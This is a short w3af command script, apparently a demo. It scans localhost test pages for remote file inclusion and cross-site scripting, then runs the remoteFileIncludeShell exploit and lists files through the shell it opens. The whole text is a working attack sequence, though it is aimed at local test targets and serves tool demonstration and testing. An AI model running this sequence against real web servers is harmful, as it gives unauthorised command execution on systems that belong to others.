# This is the remoteFileInclude demo:

plugins
audit remoteFileInclude,xss
audit config remoteFileInclude
view
set listenAddress 127.0.0.1
back
output console,textFile
output
output config textFile
set fileName output-w3af.txt
set verbosity 10
back
back
target
set target http://localhost/w3af/remoteFileInclusion/vulnerable.php?file=f0as9, http://localhost/w3af/xss/test-xss.php?a=099&b=whoami
back
start
exploit
exploit config remoteFileIncludeShell
set useXssBug True
back
exploit remoteFileIncludeShell
ls